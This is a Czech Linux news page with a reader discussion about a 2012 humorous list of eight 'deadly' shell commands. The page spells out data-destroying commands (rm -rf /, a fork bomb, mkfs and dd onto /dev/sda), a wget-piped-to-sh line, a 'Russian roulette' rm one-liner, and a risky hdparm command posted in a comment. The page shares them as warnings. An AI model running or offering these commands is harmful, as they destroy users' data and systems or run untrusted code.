abclinuxu.cz AbcLinuxu.cz itbiz.cz ITBiz.cz HDmag.cz HDmag.cz abcprace.cz AbcPráce.cz
AbcLinuxu hledá autory!
Inzerujte na AbcPráce.cz od 950 Kč
Rozšířené hledání
×
    dnes 17:11 | Komunita

    Konference OpenAlt 2025 hledá přednášející. Proběhne o víkendu 1. a 2. listopadu na půdě Fakulty informačních technologií VUT v Brně. Témata konference jsou: Otevřený a svobodný software, IoT a Hnutí tvůrců, Vzdělávání, Bezpečnost a soukromí, Otevřená společnost, komunity a data, OpenMobility a další.

    Ladislav Hagara | Komentářů: 0
    dnes 15:33 | Zajímavý článek

    Nové číslo časopisu Raspberry Pi zdarma ke čtení: Raspberry Pi Official Magazine 153 (pdf)

    Ladislav Hagara | Komentářů: 0
    dnes 12:22 | Komunita

    Byl publikován květnový přehled dění a novinek z vývoje Asahi Linuxu, tj. Linuxu pro Apple Silicon. Vývojáře lze podpořit na Open Collective a GitHub Sponsors.

    Ladislav Hagara | Komentářů: 0
    včera 21:33 | Nová verze

    Programovací jazyk Rust (Wikipedie) dnes slaví 10 let od vydání verze 1.0. Přímo na oslavě byla vydána nová verze 1.87.0. Podrobnosti v poznámkách k vydání. Vyzkoušet Rust lze například na stránce Rust by Example.

    Ladislav Hagara | Komentářů: 0
    včera 14:44 | IT novinky

    Evropská komise obvinila provozovatele čínské platformy TikTok z porušování pravidel EU kvůli netransparentnosti v reklamě. Komise, která v EU plní i funkci antimonopolního úřadu, to dnes uvedla v tiskové zprávě. TikTok, který patří čínské firmě ByteDance, se může k předběžnému nálezu vyjádřit. Pokud ale podezření komise nevyvrátí, hrozí mu pokuta až do šesti procent z ročního globálního obratu.

    Ladislav Hagara | Komentářů: 14
    14.5. 20:44 | Komunita

    Sovereign Tech Agency (Wikipedie), tj. agentura zabezpečující financování svobodného a otevřeného softwaru německou vládou, podpoří GFortran částkou 360 000 eur.

    Ladislav Hagara | Komentářů: 0
    14.5. 14:00 | IT novinky

    Microsoft hodlá zrušit zhruba tři procenta pracovních míst. Microsoft na konci loňského června zaměstnával kolem 228.000 lidí. Tři procenta z tohoto počtu představují téměř 7000 pracovních míst.

    Ladislav Hagara | Komentářů: 16
    14.5. 13:33 | IT novinky

    V říjnu loňského roku provedl Úřad pro ochranu hospodářské soutěže (ÚOHS) místní šetření u společnosti Seznam.cz. Krajský soud v Brně tento týden konstatoval, že toto šetření bylo nezákonné.

    Ladislav Hagara | Komentářů: 16
    13.5. 22:22 | Bezpečnostní upozornění

    Branch Privilege Injection (CVE-2024-45332, Paper) je nejnovější bezpečnostní problém procesorů Intel. Intel jej řeší ve včerejším opravném vydání 20250512 mikrokódů pro své procesory. Neprivilegovaný uživatel si například může přečíst /etc/shadow (YouTube).

    Ladislav Hagara | Komentářů: 2
    13.5. 14:22 | Komunita

    Dle plánu byl vývoj Firefoxu přesunut z Mercurialu na Git. Oficiální repozitář se zdrojovými kódy je na GitHubu.

    Ladislav Hagara | Komentářů: 7
    Jaký filesystém primárně používáte?
     (57%)
     (1%)
     (8%)
     (23%)
     (4%)
     (2%)
     (3%)
     (1%)
     (0%)
     (3%)
    Celkem 626 hlasů
     Komentářů: 26, poslední 8.5. 09:58
    Rozcestník

    8 smrtelných linuxových příkazů

    Na How-To Geek vyšel článek 8 smrtelných příkazů, jež byste nikdy neměli spouštět na Linuxu, a to ani v případě, nebo především, pokud jsou doporučeny v linuxové poradně. How-To Geek vybral příkaz rm -rf / a jeho variace aneb muzu nejak stopnou zabehu ftp server?, vidličkovou bombu (fork bomb) ":(){ :|: & };:" aneb testování výkonnosti systému, formátování diskového oddílu "mkfs.ext4 /dev/sda1" aneb jak najít místo na disku, uložení výstupu příkazu do souboru "command > /dev/sda", testování generátoru náhodných čísel "dd if=/dev/random of=/dev/sda", zálohování domovského adresáře "mv ~ /dev/null" a spuštění opravného skriptu "wget http://example.com/something -O – | sh". Přidat lze ruskou ruletu "[ $[ $RANDOM % 6 ] == 0 ] && rm -rf /*" a mnoho dalších.

    24.9.2012 16:04 | Ladislav Hagara | Humor


    Tiskni Sdílej: Linkuj Jaggni to Vybrali.sme.sk Google Del.icio.us Facebook

    Komentáře

    Vložit další komentář

    24.9.2012 16:21 Michal Kubeček | skóre: 72 | Luštěnice
    Rozbalit Rozbalit vše Re: 8 smrtelných linuxových příkazů

    Vidím, že pověra, že přesounout do /dev/null znamená smazat, se stále utěšeně šíří. Kdyby se autor článku obtěžoval si to aspoň vyzkoušet, zjistil by, že ten jeho "smrtelný příkaz" ve skutečnosti akorát skončí chybou:

      mike@unicorn:~> ls -ld a
      drwxr-xr-x 3 mike users 4096 24. zář 16.15 a
      mike@unicorn:~> mv a /dev/null
      mv: ne-adresář „/dev/null“ nelze přepsat adresářem „a“
    

    Aby to něco opravdu škodlivého provedlo, musel by "mv ~ /dev/null" spustit s přepínačem -f a pod rootem a i pak by hlavní problém nespočíval ve ztrátě domácího adresáře, ale spíš v tom, že by začaly selhávat programy, které potřebují /dev/null ke své funkci.

    Václav 24.9.2012 16:24 Václav "Darm" Novák | skóre: 26 | blog: Darmovy_kecy | Bechyně / Praha
    Rozbalit Rozbalit vše Re: 8 smrtelných linuxových příkazů
    Hmm, super. Ale že by takový nesmysl přehlédl i autor zprávičky?

    rm -rf / už dávno nefunguje

    mv ~ /dev/null je nesmysl absolutní a nemohlo fungovat nikdy.
    Cross my heart and hope to fly, stick a cupcake in my eye!
    24.9.2012 17:08 Ladislav Hagara | skóre: 105 | blog: Ride the Raven
    Rozbalit Rozbalit vše Re: 8 smrtelných linuxových příkazů

    Příkaz rm jsem nepřehlédl, dopsal jsem tam "a jeho variace". Stejně u ruské rulety jsem použil "rm -rf /*". Na druhé straně, pamatuji doby, když příkaz "rm -rf /" fungoval. Dle rm does not preserve root by default ještě nedávno také v Ubuntu.

    Přiznám se, že u toho příkazu mv jsem nepřemýšlel, pouze jsem zkopíroval příkaz z článku. Chtěl jsem jenom upozornit na článek. Zprávičku jsem dal do kategorie Humor.

    Václav 24.9.2012 17:09 Václav "Darm" Novák | skóre: 26 | blog: Darmovy_kecy | Bechyně / Praha
    Rozbalit Rozbalit vše Re: 8 smrtelných linuxových příkazů
    Omlouvám se za rýpání, jen mi přišlo zvláštní že by si toho někdo při překladu nevšiml :)
    Cross my heart and hope to fly, stick a cupcake in my eye!
    Václav 24.9.2012 16:40 Václav "Darm" Novák | skóre: 26 | blog: Darmovy_kecy | Bechyně / Praha
    Rozbalit Rozbalit vše Re: 8 smrtelných linuxových příkazů
    Bohyně, ty komentáře…

    „Does an antivirus on Linux prevent these commands with sudo ?“
    Cross my heart and hope to fly, stick a cupcake in my eye!
    24.9.2012 17:27 ovoce
    Rozbalit Rozbalit vše Re: 8 smrtelných linuxových příkazů
    Mě spíš "potěšilo" tohle:
    Most of these require root privilege to be effective and if you don’t know what you are doing you should not have/be using that privilege anyway
    Velmi realistická připomínka, když mluvíme o domácích uživatelích. Hlavně doufám, že se ten pindík pak někde jinde rozohňuje, že se mu MS/Apple/Google/etc pokouší vzít kontrolu nad jeho vlastním počem.
    pavlix avatar 25.9.2012 12:35 pavlix | skóre: 54 | blog: pavlix
    Rozbalit Rozbalit vše Re: 8 smrtelných linuxových příkazů
    Velmi realistická připomínka
    Naprosto realistická a u svého okolí to tak běžně praktikuju.
    Já už tu vlastně ani nejsem. Abclinuxu umřelo.
    24.9.2012 16:48 kralyk z abclinuxu | skóre: 29 | blog:
    Rozbalit Rozbalit vše Re: 8 smrtelných linuxových příkazů
    "Vidličková bomba"? To překládal Fry, ne? :-D
    Michal Fecko avatar 24.9.2012 18:35 Michal Fecko | skóre: 31 | blog: Poznámkový blog
    Rozbalit Rozbalit vše Re: 8 smrtelných linuxových příkazů
    Skôr Zoiberg.... :-D
    24.9.2012 21:34 kralyk z abclinuxu | skóre: 29 | blog:
    Rozbalit Rozbalit vše Re: 8 smrtelných linuxových příkazů
    Pardon, spletl jsem y/i, mělo tam být Fri, tedy tenhle Fri (varování: odkazované stránky obsahují brutální scény, nedoporučuje se citlivým jedincům, je tam nepokrytě vyobrazen masakr českého i anglického jazyka).
    D.A.Tiger avatar 25.9.2012 00:44 D.A.Tiger | skóre: 8 | Brno
    Rozbalit Rozbalit vše Re: 8 smrtelných linuxových příkazů
    LOL :-D
    Radost z toho, že někdo objeví něco nového, je omyl starý 6000 let... (Jean Paul) | anthill inside
    Václav 25.9.2012 10:55 Václav "Darm" Novák | skóre: 26 | blog: Darmovy_kecy | Bechyně / Praha
    Rozbalit Rozbalit vše Re: 8 smrtelných linuxových příkazů
    ARGH! Že já to otvíral. Takže už i „prezentace“ je moc nečeský?
    Cross my heart and hope to fly, stick a cupcake in my eye!
    25.9.2012 22:47 fri
    Rozbalit Rozbalit vše Re: 8 smrtelných linuxových příkazů - promítání
    Lepší bude "promítání". Alespoň u jiného programu jsem to tak zařídil. To je teprve ono. :-)
    D.A.Tiger avatar 26.9.2012 09:15 D.A.Tiger | skóre: 8 | Brno
    Rozbalit Rozbalit vše Re: 8 smrtelných linuxových příkazů
    "předvádění", nebo "představení"? :)
    Radost z toho, že někdo objeví něco nového, je omyl starý 6000 let... (Jean Paul) | anthill inside
    26.9.2012 09:37 fri
    Rozbalit Rozbalit vše prezentace - předvedení - představení - promítání - Je to takové líbivé

    Volba je to těžká.

    S "prezentací" svých myšlenek (jejich předvedením, představením) je určitě pro některé jedince život jednodušší. To je odkaz na obrázek. Je to dost možná ten samý program, kde jsem dal promítání. V tom prostředí se to může víc hodit (na způsob zobrazování obrázků v prohlížeči, okno na celou obrazovku, třeba černé pozadí - paralela s potemnělým sálem v kině).

    Obojí/všechny tři/čtyři možnosti tam zaráz nedám; i když bych je mohl od verze k verzi točit, aby to i to přišlo víc lidem normální. :)

    S představením bych počítal spíš pro program typu KPresenter, ale i tam bych vyzkoušel Promítání. Je to takové líbivé. :-)

    2.10.2012 22:42 kralyk z abclinuxu | skóre: 29 | blog:
    Rozbalit Rozbalit vše Re: prezentace - předvedení - představení - promítání - Je to takové líbivé
    Je to takové líbivé. :-)
    Prosím o odkaz na anketu, ze které byla tato informace zjištěna ;-)

    (Jinak ale když už tam musí být puristický překlad, tak bych taky spíš byl pro "promítání" než "představení".)
    25.9.2012 22:51 fri
    Rozbalit Rozbalit vše Re: 8 smrtelných linuxových příkazů - brutalita?

    Cynismus a brutalita? :-)

     

    Kdysi mi jeden fotbalista řekl, že hraju jak Goauld. A ten malej, co je teď už určitě velkej se snažil mi přezdívat Koní hlava. :-)

    24.9.2012 16:51 b022d
    Rozbalit Rozbalit vše Re: 8 smrtelných linuxových příkazů
    Vidličková bomba :D Šmankote! Nechci se dožít toho, že jednou budeme vidličkovat procesy a nikdo se nad tím ani nepozastaví :D
    25.9.2012 11:59 JoHnY2
    Rozbalit Rozbalit vše Re: 8 smrtelných linuxových příkazů
    Ještě je můžeme rozcesťovat nebo rozdvojovat, protože fork v kontextu znamená spíš to. :-D
    26.9.2012 16:27 fri
    Rozbalit Rozbalit vše Rozmnožovat
    Anebo je můžeme rozmnožovat. :)
    egg avatar 26.9.2012 18:51 egg | skóre: 20 | Praha
    Rozbalit Rozbalit vše Re: Rozmnožovat
    Však jo, procesy se rozmnožují dělením. :-)
    MMMMMMMMM avatar 25.9.2012 22:33 MMMMMMMMM | skóre: 44 | blog: unstable | Valašsko :-)
    Rozbalit Rozbalit vše Re: 8 smrtelných linuxových příkazů
    fork bomb or fart bomb, who cares :-D
    24.9.2012 17:01 Pali
    Rozbalit Rozbalit vše Re: 8 smrtelných linuxových příkazů
    Sak to nic rerobi.... Toto ale uz stoji za to: hdparm -mRuUwx --dco-restore --drq-hsm-error --fwdownload /dev/sda
    24.9.2012 20:21 depka | skóre: 20 | blog: eterity
    Rozbalit Rozbalit vše Re: 8 smrtelných linuxových příkazů
    uz 5 minut to pracuje
    24.9.2012 17:05 Olaf
    Rozbalit Rozbalit vše Re: 8 smrtelných linuxových příkazů
    Zrovna dnes jsem říkal kamarádovi, že jsem mu v noci nahrál ten zip (několik GB dat) do jeho počítače přes ssh na svůj účet atd. On za chvíli píše "foook". Použil rm místo mv. Já jen, že obsese některých jedinců řešit vše příkazy, nemusí dopadnout dobře.
    24.9.2012 17:35 kralyk z abclinuxu | skóre: 29 | blog:
    Rozbalit Rozbalit vše Re: 8 smrtelných linuxových příkazů
    Já jen, že obsese některých jedinců řešit vše příkazy, nemusí dopadnout dobře.
    To máš úplně jedno, omyl se dá udělat v jakýmkoli rozhraní... Úplně stejně se můžeš překliknout nebo použít jinou klávesovou zkratku.

    Pokud někdo má sklony dělat tyhle chyby nějak častěji, dá se doporučit si pro rm nastavit alias s volbou -i nebo -I...
    25.9.2012 14:50 jenicek
    Rozbalit Rozbalit vše Re: 8 smrtelných linuxových příkazů
    ... nebo -f...
    26.9.2012 09:58 cronin | skóre: 49
    Rozbalit Rozbalit vše Re: 8 smrtelných linuxových příkazů
    ..., dá se doporučit si pro rm nastavit alias s volbou -i nebo -I...
    Red Hat má pre root-a defaultne nastavený alias rm="rm -i". Jediný efekt je, že sa po čase človek naučí namiesto prostého rm písať rm -f, čo je cesta do pekla. Ničmenej vedomé a dobrovoľné nastavenie tohto aliasu môže viesť k žiadanému výsledku, to nepopieram. :-)
    24.9.2012 17:36 Zopper | skóre: 15
    Rozbalit Rozbalit vše Re: 8 smrtelných linuxových příkazů
    Jako by nebylo možné místo "kopírovat" kliknout na "smazat" (opravdu to jde, osobní zkušenost :-) )
    "Dlouho ještě chcete soudit proti právu, stranit svévolníkům?" Ž 82,2
    Prcek avatar 24.9.2012 18:10 Prcek | skóre: 43 | Jindřichův Hradec / Brno
    Rozbalit Rozbalit vše Re: 8 smrtelných linuxových příkazů
    Dobrý je taky ve správci souborů nechtěně kliknout při přejezdu myší přes soubory a složky. Člověk moc nedává pozor a najednou něco někam přesunul. Když se ta operace nemusí potvrzovat, tak občas chvíli trvá najít co a kam zmizelo :-D.
    Člověk je takový, jak vypadá... A já vypadám jako pravá, nefalšovaná děvka!!!
    otula avatar 24.9.2012 22:17 otula | skóre: 45 | blog: otakar | Adamov
    Rozbalit Rozbalit vše Re: 8 smrtelných linuxových příkazů
    Ještě lepší je něco dělat ve správci souborů, jako je Krusader, kdy si člověk za nějakým účelem označuje insertem soubory. No a během tohoto označování najede kurzorem na něco, co se v tu chvíli rozhodne smazat, takže stiskne bez hlubšího uvažování F8+Enter…

    Podařilo se mi jednou tímto způsobem si smazat téměř celý disk ;) Samozřejmě nezálohovaný :) Naštěstí na obnovitelném filesystému…
    Kdo vám tvrdí, že jste paranoidní, ten v tom spiknutí s největší pravděpodobností jede taky.
    25.9.2012 08:37 Kosac
    Rozbalit Rozbalit vše Re: 8 smrtelných linuxových příkazů
    To mi pripomina cca 15 let zpatky 386 40MHz a praci v DOS + AutoCAD 10. Rychle jsem dodelaval vykres, abych si stihl jeste neco zahrat, ale po AutoCADu bylo zahodno restartnout pocitac, aby se vycistila pamet.

    Sekvence prikazu Autocadu byla: save [enter] [enter] quit [enter] [ctrl]+[alt]+[delete]. Bohuzel vykres byl velky a autocad jeste ukladal... Taky bez zalohy.
    26.9.2012 17:20 SPM | skóre: 28
    Rozbalit Rozbalit vše Re: 8 smrtelných linuxových příkazů
    Já zase s oblibou mc vypínal F10 následovanou okamžitým enterem pro potvrzení. Až jsem jednoho krásného dne místo F10 zmáčknul F8...
    24.9.2012 17:50 marek_hb
    Rozbalit Rozbalit vše Re: 8 smrtelných linuxových příkazů

    já jen, že obsese některých jedinců řešit vše příkazy, nemusí dopadnout dobře.

    já se tomu snažím vyhnout jak můžu, jenže jak v kde, tak v gnome se najdou takový parchantnosti třeba při práci kopírováním, synchronizací, že tam, kde fakt chci aby to dopadlo dobře pracuju v konzoli :( a to máme prosím rok 2012 ....

    24.9.2012 22:05 Olaf
    Rozbalit Rozbalit vše Re: 8 smrtelných linuxových příkazů
    Ale já taky rád pracuji v konzoli, je to často pohodlnější/rychlejší. A často, pravda, i účinnější -- např. kdo zná zmršené názvy souborů/složek z Windows (paznaky), taková složka se nedá z GUI smazat, jen přes konzoli. Fajn. Co dodnes nechápu, je, že kopírování v GUI programu je pomalejší a trvá o sakra O(t) déle než přes konzoli (je to v tom, že GUI program to nějak cachuje do RAM nebo co?). Ale abych nebyl schopen jeden zip zkopírovat v Dolphinu a musel kvůli tomu psát do konzole, to fakt ne. :-)
    24.9.2012 22:29 marek_hb
    Rozbalit Rozbalit vše Re: 8 smrtelných linuxových příkazů

    mě naposledy nadzvedla jedna pí*ovina:

    když v krusaderu dám přes sambu kopírovat, tak se mi zkopírujou data vytvoření souboru správně, ale když dám synchronizovat, tak se mi změní na datum vytvoření souboru na datum, kdy tu synchromizaci provádím. přes NFS je to samozřejmě správně - soubor má stejné datum jak ve zdroji, tak v cílovém adresáři ...

    ... bylo by to zábavné, kdyby mi ty zálohované soubory, u který se datum změnilo třeba na 20.9.2012 nesnažily při další synchronizaci přepsat ty původní soubory z třeba 4.5.2004 a jen tak mimochodem na nich zmrvit to datum taky

    pomalost kopírování v gui a konzoli, to je kapitola sama o sobě a kódování v názvech taky :(

    aby nedošlo k mýlce - mě neva pracovat v konzoli, ale pracovat v ní z donucení, protože v gui je to sázka do loterie, to mi přijde jako ....

    24.9.2012 22:58 kralyk z abclinuxu | skóre: 29 | blog:
    Rozbalit Rozbalit vše Re: 8 smrtelných linuxových příkazů
    Ale abych nebyl schopen jeden zip zkopírovat v Dolphinu a musel kvůli tomu psát do konzole, to fakt ne. :-)
    No, někdo to vidí z druhý strany - abych nebyl schopen zkopírovat jeden zip v konzoli, a musel kvůli tomu zapínat Dolphin, to fakt ne ;-)

    Já třeba mam konzoli otevřenou non-stop, Dolphin jen někdy...

    (neříkám, že to tak je správně, ať si to dělá kdo chce jak chce ;-))
    Václav 25.9.2012 10:49 Václav "Darm" Novák | skóre: 26 | blog: Darmovy_kecy | Bechyně / Praha
    Rozbalit Rozbalit vše Re: 8 smrtelných linuxových příkazů
    Já mám na jedné ploše non-stop otevřený dolphin s konzolí v panelu :D Nejlepší filemanager.
    Cross my heart and hope to fly, stick a cupcake in my eye!
    =^..^= AmigaPower® avatar 25.9.2012 12:51 =^..^= AmigaPower® | skóre: 30 | blog: BLB | Praha
    Rozbalit Rozbalit vše Re: 8 smrtelných linuxových příkazů
    Já mam někde v systému taky konzoli, je tam pro případy kdy Kralik vyplivne nějakej "smrtící příkaz" :-D
    25.9.2012 14:05 kralyk z abclinuxu | skóre: 29 | blog:
    Rozbalit Rozbalit vše Re: 8 smrtelných linuxových příkazů
    Já mám na jedné ploše non-stop otevřený dolphin s konzolí v panelu :D Nejlepší filemanager.
    To by bylo supr, kdyby dolphin měnil aktuální cestu (cd, pushd, ...) synchroně s tím shellem...
    Václav 25.9.2012 14:13 Václav "Darm" Novák | skóre: 26 | blog: Darmovy_kecy | Bechyně / Praha
    Rozbalit Rozbalit vše Re: 8 smrtelných linuxových příkazů
    jo, to souhlasím. Obráceně to funguje. Naopak by nemusel změnu cesty v dolphinu zapisovat do historie shellu.
    Cross my heart and hope to fly, stick a cupcake in my eye!
    25.9.2012 15:16 kralyk z abclinuxu | skóre: 29 | blog:
    Rozbalit Rozbalit vše Re: 8 smrtelných linuxových příkazů
    Jj, to se mi taky nelíbilo, že mi to zapisuje příkazy do shellu,...

    Ono ale to není technicky úplně jednoduchý, ani jedno... můžeš zvenčí změnit CWD procesu? Imho ne. A stejnětak ten proces ti nedá vědět, když si změní CWD, takže by dolphin musel neustále CWD shellu sledovat, což není zrovna elegantní...

    Jediný řešení, co mě napadá, je využít debug trap v bashi pro hlášení CWD dolphinu a signal trap (třeba sigusr1) pro změnu CWD dolphinem, oboje spolu s komunikací přes nějaký fifo, ale 1) je otázka, jestli by to bylo použitelný, 2) byl by potřeba načíst obslužný shellskript, třeba přes .bashrc, a 3) je otázka, jestli by to fungovalo i v ostatních shellech.
    26.9.2012 02:29 kavol | skóre: 28
    Rozbalit Rozbalit vše Re: 8 smrtelných linuxových příkazů
    hm, nemůžou si to říct přes dbus nebo tak nějak?
    25.9.2012 22:13 jaime | skóre: 3
    Rozbalit Rozbalit vše Re: 8 smrtelných linuxových příkazů
    Tohle umi od KDE 4.9 (mozna uz 4.8). Docela me to stve, protoze pri spusteni nekterych programu (smplayer napriklad) z shellu, zmeni v "graficky" casti cestu na umisteni toho programu (napr. /usr/bin).
    =^..^= AmigaPower® avatar 25.9.2012 22:17 =^..^= AmigaPower® | skóre: 30 | blog: BLB | Praha
    Rozbalit Rozbalit vše Re: 8 smrtelných linuxových příkazů
    To už je KDE 4.9?? Ať dou do prdele, ty abdejty se snad ani nedaj stíhat, dyk sem nedávno šel ze 3.5 na 4.1 :-D
    24.9.2012 18:36 nold
    Rozbalit Rozbalit vše Re: 8 smrtelných linuxových příkazů
    Pánové chybička se mi vloudila několikrát, při stupidním rozložení klávesnice. Někteří kolegové v práci mají klávesnice (a nechtějí si je nechat vzít) co mají namísto kláves Insert a Delete jednu velkou klávesu DELETE. Výborná věc! Párkrát se mi tak ze zvyku povedlo Shift + "Insert" ... Hned jsem měl o zábavu postaráno.
    24.9.2012 19:21 Jiří J. | skóre: 34 | blog: Poutník | Brno
    Rozbalit Rozbalit vše Re: 8 smrtelných linuxových příkazů

    A už akceptují novější thinkpady starší klávesnice? Mám pocit, že tam byl nějaký problém s BIOSem - sám mám bohužel také velký delete a často narážím na posunutý insert. Nicméně mohu být rád, že nemám X230.

    25.9.2012 12:04 JoHnY2
    Rozbalit Rozbalit vše Re: 8 smrtelných linuxových příkazů
    Lenovo se zvbaznilo s tema klavesnicema. Z nej klavesnic na praci udelali multimedialni hruzu, kterou tedka budou co generaci nejak predelavat, protoze si bude 50% uzivatelu thinkpadu stezovat.
    D.A.Tiger avatar 25.9.2012 00:47 D.A.Tiger | skóre: 8 | Brno
    Rozbalit Rozbalit vše Re: 8 smrtelných linuxových příkazů
    Smrtelné příkazy... hmm. Já nevím, ale už jsem zažil situaci, kdy jsem mkfs prostě potřeboval a Linux mi neumřel....

    Jinak obávám se, že na většinu operací přímo se souborem zařízení budou potřeba rootovská práva.
    Radost z toho, že někdo objeví něco nového, je omyl starý 6000 let... (Jean Paul) | anthill inside
    25.9.2012 08:07 mich | skóre: 16
    Rozbalit Rozbalit vše Re: 8 smrtelných linuxových příkazů
    A třeba zrovna ten mkfs ti na mountnutý filesystém neprojde (v té podobě co ho v článku uvádí = bez dvojitého -F).
    je to teď v módě, na žive o tom furt píšou
    D.A.Tiger avatar 25.9.2012 11:57 D.A.Tiger | skóre: 8 | Brno
    Rozbalit Rozbalit vše Re: 8 smrtelných linuxových příkazů
    teď si fakt nejsem jistý, ale neprovede se to až při ukončování systému(tedy odmountnutí jednotek)? Mám ten dojem, že některé nástroje to tak dělají.
    Radost z toho, že někdo objeví něco nového, je omyl starý 6000 let... (Jean Paul) | anthill inside
    pavlix avatar 25.9.2012 12:44 pavlix | skóre: 54 | blog: pavlix
    Rozbalit Rozbalit vše Re: 8 smrtelných linuxových příkazů
    mkfs je nízkoúrovňový nástroj, dělá pouze to, co se mu řekne a pouze v tu chvíli, kdy se mu to řekne
    Já už tu vlastně ani nejsem. Abclinuxu umřelo.
    D.A.Tiger avatar 25.9.2012 14:12 D.A.Tiger | skóre: 8 | Brno
    Rozbalit Rozbalit vše Re: 8 smrtelných linuxových příkazů
    Dobře, v tom případě jsem se asi spletl v nástrojích, mea culpa. Mimochodem, nenapadá mě nástroj, který by takhle manipuloval s připojeným fs.
    Radost z toho, že někdo objeví něco nového, je omyl starý 6000 let... (Jean Paul) | anthill inside
    25.9.2012 08:26 psholty2 | skóre: 7 | blog: char
    Rozbalit Rozbalit vše Re: 8 smrtelných linuxových příkazů
    Tak sa priznajte, kolko z vas uz niekedy omylom miesto "fsck.ext2 /dev/sda1" napisali "mkfs.ext2 /dev/sda1" ?
    pavlix avatar 25.9.2012 12:45 pavlix | skóre: 54 | blog: pavlix
    Rozbalit Rozbalit vše Re: 8 smrtelných linuxových příkazů
    Nepřiznám.

    Zatloukat, zatloukat a zatloukat, jak říkal doktor Plzák.
    Já už tu vlastně ani nejsem. Abclinuxu umřelo.
    25.9.2012 13:00 Michal Kubeček | skóre: 72 | Luštěnice
    Rozbalit Rozbalit vše Re: 8 smrtelných linuxových příkazů
    Myslím že nikdy. Používám přímo e2fsck a mke2fs, tam to tolik nesvádí k záměně.
    26.9.2012 17:19 SPM | skóre: 28
    Rozbalit Rozbalit vše Re: 8 smrtelných linuxových příkazů
    Já :) jenom to bylo ext3. A asi 4TB velký pole, moc velká sranda :) od tý doby ráno bez kafe zásadně nic nedělám.
    25.9.2012 12:55 wake
    Rozbalit Rozbalit vše Re: 8 smrtelných linuxových příkazů
    prikaz dd if=/dev/random of=/dev/sdg bs=4096 obcas pouzivam, kdyz nekomu pujcuju disk... ;-)
    25.9.2012 12:58 Michal Kubeček | skóre: 72 | Luštěnice
    Rozbalit Rozbalit vše Re: 8 smrtelných linuxových příkazů
    A to se dočkáte konce?
    25.9.2012 15:20 Martin Seman | blog: mseman | Praha
    Rozbalit Rozbalit vše Re: 8 smrtelných linuxových příkazů
    ked ma dostatok entropy a casu, tak preco by nemal?
    25.9.2012 15:24 Michal Kubeček | skóre: 72 | Luštěnice
    Rozbalit Rozbalit vše Re: 8 smrtelných linuxových příkazů
    Kdysi jsem to zkoušel měřit a i když jsem kroužil myší, div mi ruka neupadla, dostal jsem se s bídou na jednotky KB/s (možná ani to ne).
    25.9.2012 15:36 Martin Seman | blog: mseman | Praha
    Rozbalit Rozbalit vše Re: 8 smrtelných linuxových příkazů
    mozno k tomu kruzeniu mysou prida aj trieskanie do klavesnice :) ale nie. prave koli tomu som v povodnom komente napisal dostatok casu
    Heron avatar 25.9.2012 16:54 Heron | skóre: 53 | blog: root_at_heron | Olomouc
    Rozbalit Rozbalit vše Re: 8 smrtelných linuxových příkazů
    Ještě by v kompu mohl mít nějaký generátor entropie.
    25.9.2012 17:17 Michal Kubeček | skóre: 72 | Luštěnice
    Rozbalit Rozbalit vše Re: 8 smrtelných linuxových příkazů
    Možná… Abych pravdu řekl, nemám moc představu, jak rychlé jsou ty HW generátory. Přinejmenším by ho aspoň tolik nebolela ruka. :-)
    Heron avatar 25.9.2012 18:51 Heron | skóre: 53 | blog: root_at_heron | Olomouc
    Rozbalit Rozbalit vše Re: 8 smrtelných linuxových příkazů
    Kdesi byl návod, jak si udělat generátor šumu. Vzala se nějaká hodně stupidní dioda, zapojila se opačně, zahřála se a připojila se přes zesilovač na linkový nebo mikrofonní vstup. Sice to není zdroj dokonalé entropie jako třeba různé založené na kvantových jevech, ale afaik je to pořád lepší, než uměle počítaný urandom. Občas si při generování klíčů hodně dlouho počkám a tohle by to mohlo řešit.
    26.9.2012 10:16 Michal Vyskočil | skóre: 60 | blog: miblog | Praha
    Rozbalit Rozbalit vše Re: 8 smrtelných linuxových příkazů
    No, alespoň podle autorů haveged, je CPU slušným generátorem entropie a obvykle bývá dostatečně rychlý ;-)
    When your hammer is C++, everything begins to look like a thumb.
    26.9.2012 10:24 Michal Vyskočil | skóre: 60 | blog: miblog | Praha
    Rozbalit Rozbalit vše Re: 8 smrtelných linuxových příkazů
    Jinak drobný benchmark
    # systemctl stop haveged.service
    dd if=/dev/random of=/dev/zero count=1M bs=1024 iflag=fullblock
    ^C0+0 records in
    0+0 records out
    0 bytes (0 B) copied, 5.24942 s, 0.0 kB/s
    # systemctl start haveged.service
    # dd if=/dev/random of=/dev/zero count=1M bs=1024 iflag=fullblock
    ^C215910+0 records in
    215910+0 records out
    221091840 bytes (221 MB) copied, 64.761 s, 3.4 MB/s
    
    When your hammer is C++, everything begins to look like a thumb.
    26.9.2012 09:22 R
    Rozbalit Rozbalit vše Re: 8 smrtelných linuxových příkazů
    Keby tam bolo "if=/dev/zero" a "bs=1M", tak by som tomu aj veril. Inak je to nepouzitelne, jedine ze by si disk pripravoval na pozicanie dva roky.
    otula avatar 26.9.2012 11:52 otula | skóre: 45 | blog: otakar | Adamov
    Rozbalit Rozbalit vše Re: 8 smrtelných linuxových příkazů
    nebo /dev/urandom – to používám já, když potřebuji vyhladit data na disku. Ono to i tak trvá šíleně dlouho.
    Kdo vám tvrdí, že jste paranoidní, ten v tom spiknutí s největší pravděpodobností jede taky.
    26.9.2012 12:26 Honza Jaroš | skóre: 6 | blog: moje_strana_plotu | Bohnice
    Rozbalit Rozbalit vše Re: 8 smrtelných linuxových příkazů
    Tak v takovémhle případě mi přišlo nejrychlejší vytvořit z daného disku šifrované zařízení, to přepsat nulama a pak náhodnými daty přemazat jen začátek disku, abych se zbavil LUKS hlavičky...

    Pro nevratnou likvidaci dat pak používám hvězdičkový šroubovák a kladivo... :-)
    otula avatar 26.9.2012 23:49 otula | skóre: 45 | blog: otakar | Adamov
    Rozbalit Rozbalit vše Re: 8 smrtelných linuxových příkazů
    No já tyto věci řeším pouze v práci, když musím nějaké PC odvézt do pryč, takže to prostě pustím, další den to pustím znovu a do zápisu o likvidaci zapíšu, že to bylo přepsáno /dev/urandom (myslím, že ti, kdo ten zápis pak dostanou do rukou, asi stejně nechápou, co to znamená ;-) ) Kladivo použít nemohu :-(
    Kdo vám tvrdí, že jste paranoidní, ten v tom spiknutí s největší pravděpodobností jede taky.
    26.9.2012 23:42 Jiří J. | skóre: 34 | blog: Poutník | Brno
    Rozbalit Rozbalit vše Re: 8 smrtelných linuxových příkazů

    Takový shred(1) nebo badblocks(8) to umí daleko rychleji, než /dev/urandom. Sice je výsledek asi méně náhodný, ale při několikanásobném průběhu stejně nikdo nepozná, co byla původní data a co je pseudonáhodný šum.

    otula avatar 26.9.2012 23:52 otula | skóre: 45 | blog: otakar | Adamov
